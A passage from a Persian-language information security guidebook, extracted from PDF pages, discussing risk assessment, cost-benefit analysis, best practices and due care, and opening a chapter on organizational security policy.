ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺑﺎ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﻩ ﺑﺎﻳﺪ ﻣﻘﺎﺑﻠﻪ ﻛـﺮﺩ ﻭ ﻛـﺪﺍﻣﻴﻚ ﺭﺍ
ﺑﺎﻳــﺪ ﭘــﺬﻳﺮﻓﺖ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻳــﻚ ﺗﺤﻠﻴــﻞ ﺳــﻮﺩ ﻭ ﺯﻳــﺎﻥ -
ﺗﺨﺼﻴﺺ ﻫﺰﻳﻨﻪ ﺑﻪ ﻫﺮ ﺯﻳﺎﻥ ﺍﺣﺘﻤﺎﻟﻲ؛ ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ
ﺁﻥ ،ﺗﻌﻴﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻫﺮ ﻣﺨﺎﻃﺮﻩ ،ﻭ ﺳﭙﺲ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ
ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺸﺘﺮ ﺍﺳـﺖ ﻳـﺎ ﻧـﻪ -
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻋـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺑﻮﺟـﻮﺩ
ﻼ ﻋﻠﻤﻲ ﻭ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ
ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻓﺮﺁﻳﻨﺪ ﻛﺎﻣ ﹰ
ﺑﻴﺎﻳﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﻛﻨﺎﺭ ﻫﻢ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺍﻳـﻦ ﺍﻋـﺪﺍﺩ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ ﻭ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ ﻧﻴﺰ
ﺗﻨﻬﺎ ﺍﻋـﺪﺍﺩ ﻏﻴﺮﺩﻗﻴـﻖ ﻫـﺴﺘﻨﺪ .ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺑـﻪ ﺗﻮﺍﻧـﺎﻳﻲ
ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳﻚ ﺩﺍﺭﺍﺋﻲ ،ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ
ﻣﺨﺎﻃﺮﻩ ﺑﺮﺍﻱ ﺁﻥ ﺩﺍﺭﺍﺋﻲ ،ﺷﻨﺎﺳﺎﻳﻲ ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻣﺤﺎﺳﺒﻪ ﺗﺄﺛﻴﺮ ﺑﺎﻟﻘﻮﺓ ﻫﺮ ﺍﻧﺘﺨﺎﺏ
ﺷﺎﺧﺼﻬﺎﻳﻲ ﻛﻪ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺁﻧﻬـﺎ ﺑـﺴﻴﺎﺭ ﺩﺷـﻮﺍﺭ ﺍﺳـﺖ -ﺑــﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﭼﮕﻮﻧــﻪ ﻣﺨــﺎﻃﺮﺓ ﻳـﻚ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﻪ ﺧﻮﺍﻫــﺪ
ﺗﻮﺍﻧﺴﺖ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ ﻣﺤﺎﺳﺒﻪ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﮔﺮ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺖ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﺳﭙﺲ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ .ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﺸﺮﻭﺡ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ
ﻟﺰﻭﻣﹰﺎ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺘﻨﺪ.
ﺷﺮﻛﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ ﻭ ﻣﻤﻴـﺰﻱ ﺩﺍﺭﺍﻱ ﺗﻴﻤﻬـﺎﻱ ﻣﺘـﺸﻜﻞ ﺍﺯ
ﻣﺘﺨﺼﺼﻴﻦ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﻧـﺼﺒﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ.
١٤٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﻭ ﻛـﺸﻒ ﺁﺳـﻴﺒﻬﺎﻱ
ﺟﺪﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ ،ﻳﺎ ﺑﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﻭ ﺍﺻـﻼﺡ ﺁﺳـﻴﺒﻬﺎ
ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ؟ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺨﻮﺑﻲ ﻣـﻮﺭﺩ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ
ﺩﺍﺭﺩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﺍﻳﻤﻦﺗﺮ ﻣﻲﺷـﻮﺩ ﻳـﺎ ﻧـﺎﺍﻣﻦﺗـﺮ؟ ﻭ ﭼﮕﻮﻧـﻪ
ﺧﺴﺎﺭﺗﻬﺎﻱ ﺗﻘﺮﻳﺒﻲ ﻳـﻚ ﻧﻔـﻮﺫ ﻣﻮﻓـﻖ ﺭﺍ ﻣﺤﺎﺳـﺒﻪ ﻣـﻲﻛﻨﻴـﺪ؟
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻣﻄﺎﻟﻌﺎﺕ ﻋﻠﻤﻲ ﻭ ﺁﻣﺎﺭﻱ ﺍﻧﺪﻛﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣـﺴﺎﺋﻞ
ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻓﺮﺍﺩ ﺑﻴﺸﻤﺎﺭﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭘﺎﺳـﺦ ﺍﻳـﻦ
ﺳﺆﺍﻻﺕ ﺭﺍ ﻣﻲﺩﺍﻧﻨﺪ؛ ﺍﻣﺎ ﻣﺤﻘﻘﺎﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﻓـﺮﺍﺩ
ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻗﺎﺩﺭ ﺑﻪ ﺗﺨﻤﻴﻦ ﺻﺤﻴﺢ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ
ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ.
ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗﻲ ﺭﻭﺵ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ،ﺩﺭ ﺳـﺎﻟﻬﺎﻱ
ﺍﺧﻴﺮ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ
ﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ٧٦ﻳـﺎ ﻣﺮﺍﻗﺒـﺖ ﺩﻗﻴـﻖ ٧٧ﻧـﺎﻡ ﺩﺍﺭﺩ .ﺍﻳـﻦ
ﺭﻭﻳﻜﺮﺩ ﺷﺎﻣﻞ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ،ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ
ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻣﻌﻤﻮﻝ ﺩﺭ ﺟﻮﺍﻣﻊ ﻣﺤﻘﻘﺎﻥ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺋﻴﺪﺷﺪﻩ ﻛـﻪ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﻣﻲﺭﺳـﺎﻧﺪ ﻭ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﻣﻌﻘـﻮﻟﻲ ﻛـﺎﻫﺶ ﻣـﻲﺩﻫـﺪ .ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺭﺍ "ﺑـﺪﻳﻬﻴﺎﺕ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻣﻨﻄﻘـﻲ ﺗـﺪﺍﺑﻴﺮ
ﺍﻣﻨﻴﺘﻲ" ﺑﺪﺍﻧﻴﺪ.
ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﻫـﻢ ﻣــﺸﻜﻼﺕ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﺩ.
ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻴﭻ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻣﺤﻴﻄﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﺎﺳﺐ
ﺑﺎﺷﺪ .ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ
ﻣﺎﻟﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺒﺎﻫﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﻚ ﺧﺒﺮﻧﺎﻣﺔ ﺍﺟﺘﻤﺎﻋﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑﻪ
ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺍﻗـﺪﺍﻣﺎﺕ
ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ.
ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺗـﻀﻤﻴﻦ ﻛﻨـﺪ ﻛـﻪ
ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺭﻭﺑـﺮﻭ ﻧﺨﻮﺍﻫـﺪ ﺷـﺪ .ﺩﺭ ﻏﺎﻟـﺐ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ
ﺍﺧﺒــﺎﺭ ﺣﻤــﻼﺕ ﺟﺪﻳــﺪ ﻭ downloadﻛــﺮﺩﻥ ﻭﺻــﻠﻪﻫــﺎﻱ
ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺑﺮﺭﺳـﻲ
ﻧﻤﺎﻳﺪ .ﺍﻣﺎ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﻧﻴـﺰ ﭘﻴـﺮﻭﻱ ﻛﻨﻴـﺪ،
ﻣﻬﺎﺟﻤﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺴﺨﻴﺮ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺷﻤﺎ ﺍﺯ ﺷﻴﻮﻫﺎﻱ ﻧﺎﺩﺍﻧﺴﺘﺔ ﺗﺎﺯﻩ ﻭ ﻣﻨﺘﺸﺮﻧﺸﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺣﺎﻝ
Best Practices
Due Care
76
77
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺍﺧﺒﺎﺭ ﺟﺪﻳﺪ ﻛﻢ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺷﺨـﺼﻲ ﻛـﻪ
ﻣﺴﺌﻮﻝ ﺑﺮﺭﺳﻲ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺳـﺖ ﺩﺭ ﺳـﻔﺮ
ﺑﺎﺷﺪ ،ﻣﻬﺎﺟﻢ ﺍﺯ ﺷﻤﺎ ﭘﻴﺸﻲ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﺍﻳﻦ ﺗﻔﻜﺮ ﻛﻪ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻳـﺎ ﺑﺎﻳـﺪ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻨﻨﺪ
ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ
ﺗﻤﺎﻣﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻨﺎﺳﺐ ﻭ ﺑﻪﺻﺮﻓﻪ ﻧﻴﺴﺘﻨﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ
ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﺯ ﺣﺪﺍﻗﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ؛ ﻭ ﺩﺭ ﻋﻤـﻞ ،ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﻭ ﻳﺎ ﺑﻌﺒﺎﺭﺗﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨﻪ ﻫﻢ ﺧﻮﺩ ﻭﺍﻗﻌـﹰﺎ ﺑﻬﻴﻨـﻪ
ﻧﻴﺴﺘﻨﺪ!
ﺗﻮﺻﻴﺔ ﻣﺎ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺩﻭ ﺭﻭﻳﻜﺮﺩ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﺍﺳﺖ .ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺪﻧـﺔ ﻳـﻚ ﻣﺠﻤﻮﻋـﻪ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳﺮﺁﻣﺪﻱ ،ﻳﻚ ﻃﺮﺍﺡ ﺁﮔﺎﻩ ﺑﺎﻳـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨـﺪ ،ﻭ
ﺑﺮﺍﻱ ﻫﺮ ﺣﺎﻟﺖ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻌﻘﻮﻝ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳـﺪ.
ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎﻳﺪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺠﺰﺍ ﻗﺮﺍﺭ
ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳــﻖ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻳﻲ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺣﺪﺍﻗﻞ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﻓﻌـﺎﻝ
ﺍﺳﺖ .ﻣﺘﺼﺪﻳﺎﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻐﻴﻴـﺮﺍﺕ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ،ﺑـﺎ
ﻭﺻﻠﻪﻫﺎ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻧﺪ ،ﻭ ﻣﻨﺘﻈﺮ ﺣﻮﺍﺩﺙ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ
ﺑﺎﺷـﻨﺪ .ﺍﻧﺠــﺎﻡ ﺻـﺤﻴﺢ ﺍﻳــﻦ ﻣـﻮﺍﺭﺩ ﻧﻴــﺎﺯ ﺑـﻪ ﺩﺭﻙ ﻋﻤﻴﻘـﻲ ﺍﺯ
ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﻻﻳﻞ ﻋﻤﻠﻜﺮﺩ ﻧﺎﺻـﺤﻴﺢ ﺁﻥ ﺩﺍﺭﺩ.
ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺑﻌﺪﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺩﻧﺒـﺎﻝ
ﻣﻲﺷﻮﺩ.
١٤٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﭘﻨﺠﻢ
ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ
ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ
ﻛﻠﻴﺎﺕ
ﺍﻣﻨﻴﺖ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴﺖ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﮕﺎﻥ ﻧﻴﺴﺖ .ﻫﺮ ﭼﻘـﺪﺭ ﻛـﻪ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺷـﻤﺎ
ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﻮﻧﺪ ،ﺑﻪ ﻫﻤﺎﻥ ﻣﻴـﺰﺍﻥ ﻫﺰﻳﻨـﺔ ﺁﻧﻬـﺎ ﺑـﺎﻻﺗﺮ ﺧﻮﺍﻫـﺪ
ﺭﻓﺖ .ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺑـﺎﻻﺗﺮﻱ ﺑﻬـﺮﻩ
ﻻ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ
ﻣﻲﺑﺮﻧﺪ ﻣﻌﻤﻮ ﹰ
ﺟﺎﻧﺐ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺪﺭﺗﻤﻨﺪ -ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳـﺨﺖ ﻭ
ﺑﻌﻀﹰﺎ ﺧﻄﺮﻧﺎﻛﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻧﻴﺴﺘﻨﺪ
ﻭ ﺩﺭ ﻗﺒﺎﻝ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺁﻥ ﻧﻴﺰ ﭘﺎﺳﺨﮕﻮ ﻧﻤﻲﺑﺎﺷﻨﺪ -ﻣﻮﺭﺩ ﺗﻬﺪﻳﺪ
ﻭﺍﻗﻊ ﺷﻮﺩ .ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ
ﻗﺪﺭﺕ ﺳﻴﺎﺳـﻲ ﺑﻬـﺮﻩﻣﻨـﺪ ﺑﺎﺷـﻨﺪ .ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ ،ﺑﻌـﻀﻲ ﺍﺯ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺣﺴﺎﺱ ﻛﻨﻨﺪ ﻛﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ
ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻨﺎﺳﺐ ﺑﺴﻴﺎﺭ ﭘﺮﺧﺮﺝ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ
ﺑﺪﻭﻥ ﺻﺮﻑ ﻭﻗﺖ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻳﻦ ﺧﻄﺮﺍﺕ
ﻭ ﺑﺪﻭﻥ ﺗﻮﺟﻪ ﺑﻪ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨـﺪ.
ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺍﺭﺍﺋـﻪ
ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﮔﺎﻣﻬـﺎﻱ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺣـﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺗـﺄﻣﻴﻦ
ﺣﺪﺍﻛﺜﺮ ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ
ﺯﻣﺎﻧﻲ ،ﭘﺮﺳﻨﻠﻲ ﻭ ﻣﺎﻟﻲ ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ.
ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ،ﺷﻤﺎ ﺑﺎﻳـﺪ
ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﻴﺪ ﻛﻪ ﻃﺒﻖ ﺑﺮﻧﺎﻣﻪ ﻋﻤﻞ ﻧﻤﺎﻳﻨـﺪ.
ﻏﺎﻟﺐ ﻣﺪﻳﺮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﺼﺮﻱ ﺩﺍﺭﻧـﺪ ،ﻭﻟـﻲ
